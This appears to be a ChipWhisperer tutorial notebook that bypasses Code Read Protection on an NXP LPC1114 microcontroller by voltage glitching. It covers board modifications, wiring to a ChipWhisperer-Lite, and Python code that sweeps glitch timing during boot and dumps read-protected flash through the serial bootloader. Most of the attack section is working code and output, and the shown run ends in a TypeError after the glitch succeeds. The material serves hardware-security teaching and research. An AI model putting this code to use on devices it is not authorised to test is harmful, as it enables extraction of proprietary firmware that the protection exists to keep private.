## Background on Code Read Protection

To help protect proprietary code from being dumped via a bootloader or a debugging interface, many microcontrollers include some mechanism that locks down the flash and prevents reads. In the case of NXP's LPC1114, this is done by reading a value from flash during the boot sequence, with different values corresponding to different levels of protection. As is shown in the figure below, there are 4 levels of read protection, with the rest of the values representing an unlocked device. This makes this a great target for glitching, as corrupting one bit from this read will unlock the device and give us full access. Since higher CRP levels are harder (or in the case of CRP level 3, "impossible") to remove, we'll be using the device in CRP level 1.

| Name    | Value in FLASH  | JTAG/SWD | Serial Bootloader (ISP) | Notes                                                                                |
|---------|-----------------|----------|-------------------------|--------------------------------------------------------------------------------------|
| NO_ISP  | 0x4E697370      | enabled  | disabled                |                                                                                      |
| CRP1    | 0x12345678      | disabled | subset                  | Read memory disabled. Sector erase and mass erase possible (which also removes CRP). |
| CRP2    | 0x87654321      | disabled | subset                  | Read memory disabled. Mass erase only (which also removes CRP).                      |
| CRP3    | 0x43218765      | disabled | disabled                | Claimed impossible to recover from since no reprogramming interface.                 |
| INVALID | Any other Value | enabled  | enabled                 |                                                                                      |

This was first published by Chris Gerlinsky at RECON Brussels. You can [see his slides here](https://recon.cx/2017/brussels/resources/slides/RECON-BRX-2017-Breaking_CRP_on_NXP_LPC_Microcontrollers_slides.pdf) or watch his [presentation here](https://www.youtube.com/watch?v=98eqp4WmHoQ). It was [re-created by Dmitry Nedospasov on his blog](https://toothless.co/blog/bootloader-bypass-part1/), which has additional details and examples of how you can achieve this attack.

We'll be recreating the attack with the ChipWhisperer, to show the value of this modular platform in quickly testing new attacks.


## Hardware Setup

This tutorial requires some hardware setup. We will use a "LPC-P1114" development board, available from Mouser or Digikey.

### ChipWhisperer-Lite (CW1173) with LPC-P1114 Development Board

To allow the ChipWhisperer-Lite to interface with this board, we'll need to make some small modifications to the board:

1. Short jumper BLD_E to put the device in bootloader mode.
2. Solder a wire from GND to P0_3 (Second column from the left, fourth row from the bottom) to put the bootloader in UART mode.
3. Remove C1 and C4 from the board.
4. Cut the traces on 3.3V_CORE and 3.3V_IO_E.
5. Add a 12-ohm resistor on the 3.3V_CORE jumper.
6. Add an SMA connector to the board and connect Vcc to the center pin and GND to one of the outside pins (or just use a jumper instead of fancy SMA).
7. Add a header pin/wire to RST (First column from the left, third row from the bottom). The CW-Lite needs two connection points, as we'll be both resetting this pin and triggering off of it.

The following shows the required modifications:

![Image show LPC-P1114 Modifications](img\A9_LPC1114_CHANGES.jpg)

Next, we'll need to connect the CW-Lite to the connect pins on the dev board to pins on CW-Lite's 20 pin header:

1. Connect pin 1 of UEXT (Vcc) to pin 3 on the CW-Lite
2. Connect pin 2 of UEXT (GND) to pin 2 on the CW-Lite
3. Connect pin 3 of UEXT (TXD) to pin 10 on the CW-Lite
4. Connect pin 4 of UEXT (RXD) to pin 12 on the CW-Lite
5. Connect RST (the 3 header pins soldered on) to pins 5 (nRST) and 16 (GPIO4) on the CW-Lite
7. Finally, attach an SMA cable between the one you added to the board and the GLITCH connector on the CW-Lite. If you'd like instead you can also use a SMA Tee to do both measurement & glitch.

![Image show LPC-P1114 Connections](img\A9_LPC_CWLITE_Conn.jpg)


## Attack

In [3]:
import sys
import binascii

import time
import logging
import os
from collections import namedtuple
import numpy as np
import chipwhisperer as cw
from tqdm import trange

scope = cw.scope()
target = cw.target(scope)

Serial baud rate = 38400


In [4]:
# Original attack done with 100 MHz clock - can be helpful to run this
# 2x faster to get better resolution, which seems useful for glitching certain boards
freq_multiplier = 2

#Initial Setup
scope.adc.samples = 10000
scope.adc.offset = 0
scope.clock.adc_src = "clkgen_x1"
scope.trigger.triggers = "tio4"
scope.io.glitch_lp = True
scope.io.hs2 = None

In [5]:
scope.glitch.width = 40
scope.io.tio1 = "serial_rx"
scope.io.tio2 = "serial_tx"
scope.adc.basic_mode = "rising_edge"
scope.clock.clkgen_freq = 100000000 * freq_multiplier
scope.glitch.clk_src = "clkgen"
scope.glitch.trigger_src = "ext_single"
scope.glitch.output = "enable_only"

target.baud = 38400
target.key_cmd = ""
target.go_cmd = ""
target.output_cmd = ""

Serial baud rate = 38400


In [28]:
# Glitcher
class LPC_LowLevel(object):
    def __init__(self, scope, target):
        self.scope = scope
        self.target = target
        self.serial = target.ser

    def setup_bootloader(self, delay = 0.05):
        self.serial.flush()
        self.serial.write("?")
        #wait for full response, since we need to make sure we don't throw off baud calc
        self.read_line(0)
        self.serial.write("Synchronized\r\n")
        self.read_line(10)
        self.read_line(10)

        self.serial.write("12000\r\n")
        self.read_line(10)
        self.read_line(10)

        self.serial.write("A 0\r\n") #turn echo off
        self.read_line(10)

        self.serial.flush()

    def check_err_rtn(self, s):
        if "0" in s:
            return True
        else:
            #sometimes reading the error code fails for some reason, so don't do anything
            #about these unexpected returns
            if "19" not in s:
                print( "Unexpected error code " + s)
            return False

    def get_read_string(self, timeout = 50):
        self.serial.write("R 0 4\r\n")
        return self.read_line(timeout)


    def read_line(self, timeout = 50, term = '\n'):
        ch = " "
        s = ""
        while ch != "\n" and ch != "":
            ch = self.serial.read(1, timeout)
            s += ch
        return s

    def rst_low(self):
        self.scope.io.nrst = 'low'
    def rst_high(self):
        self.scope.io.nrst = 'high'

In [35]:
class LPC_FlashRead(object):
    
    def __init__(self, lowlevel):
        self.ll = lowlevel
    
    def dump_flash(self, print_status=True, start_addr = 0, length = 0x8000, rd_len = 24):
        '''
        read flash in rd_len byte increments and store in uu, binary, and ascii files
        NOTE: rd_len should be chosen so that it is less than 45 bytes (since we can
        only handle 1 line at a time) and uu to binary is a whole number
        (ie rd_len * 4 / 3 is a whole number), as the decode doesn't like padding bytes

        start_addr and length must be 4 byte aligned (so divisible by 4)

        If unsure, just use the defaults
        '''
        if start_addr % 4:
            print ("Address not 4 byte aligned!")
            return -1
        if length % 4:
            print ("Length not 4 byte aligned!")
            return -1

        #eat data return and checksum
        self.ll.read_line()
        self.ll.read_line()
        self.ll.serial.write("OK\r\n")

        time.sleep(0.1)

        uu_file = open("uu_flash.txt", "w")
        ascii_file = open("ascii_flash.txt", "w")
        bin_file = open("bin_flash.bin", "wb")

        print ("Starting Dump...")
        for i in range(start_addr, start_addr + length - 1, rd_len):
            self.ll.serial.write("R {:d} {:d}\r\n".format(i, rd_len))
            err = self.ll.read_line()

            #only checking addr errors at this point
            if "13" in err:
                #addr err
                print ("addr error: addr = {:d}".format(i))
                return -1

            flash = self.ll.read_line()
            #print(flash)
            if flash:
                data_len = ord(flash[0]) - 32
                if rd_len != data_len:
                    print ("Unexpected data_len {:x}, expected {:x}".format(data_len, rd_len))
                    print ("Actual flash: " + flash)

                # Bootloader uses ` instead of space for 0
                data = flash.replace('`', " ")
                checksum = self.ll.read_line() #eat checksum for now, can check it later


                self.ll.serial.write("OK\r\n")
                try:
                    uu_file.write("0x{:08x}: ".format(i) + data + "\n")                   
                    binary_data = binascii.a2b_uu(data)
                    
                    ascii_dump = "0x{:08x}: ".format(i) + binascii.hexlify(binary_data)
                    
                    if print_status:
                        print(ascii_dump)
                    
                    bin_file.write(binary_data)
                    ascii_file.write(ascii_dump + "\n")
                except binascii.Error as e:
                    print( "Invalid data: " + data)
                    print( "\nError: " + str(e) + "\n")


        uu_file.close()
        bin_file.close()
        ascii_file.close()
        return 0

In [36]:
glitcher = LPC_LowLevel(scope, target)

Range = namedtuple("Range", ["min", "max", "step"])
offset_range = Range(5180*freq_multiplier, 5185*freq_multiplier, 1)
repeat_range = Range(8*freq_multiplier, 15*freq_multiplier, 1)

scope.glitch.repeat = repeat_range.min

dumper = LPC_FlashRead(glitcher)

In [37]:
print("Attempting to glitch LPC Target")
done = False
while done == False:
    scope.glitch.ext_offset = offset_range.min
    if scope.glitch.repeat >= repeat_range.max:
        scope.glitch.repeat = repeat_range.min
    while scope.glitch.ext_offset < offset_range.max:

        glitcher.rst_low()
        scope.arm()
        glitcher.rst_high()

        timeout = 100
        while target.isDone() is False:
            timeout -= 1
            time.sleep(0.01)

        glitcher.setup_bootloader()

        s = glitcher.get_read_string()

        print( "Read string: " + s)
        print( "Offset = {:04d}, Repeat = {:02d}".format(scope.glitch.ext_offset, scope.glitch.repeat))
        if glitcher.check_err_rtn(s):
            print ("Success - we got this!")
            dumper.dump_flash()
            done = True
            break
            
        scope.glitch.ext_offset += offset_range.step

    scope.glitch.repeat += repeat_range.step

Attempting to glitch LPC Target
Read string: 0

Offset = 10360, Repeat = 16
Success - we got this!
Starting Dump...


TypeError: can only concatenate str (not "bytes") to str

In [ ]:
scope.dis()
target.dis()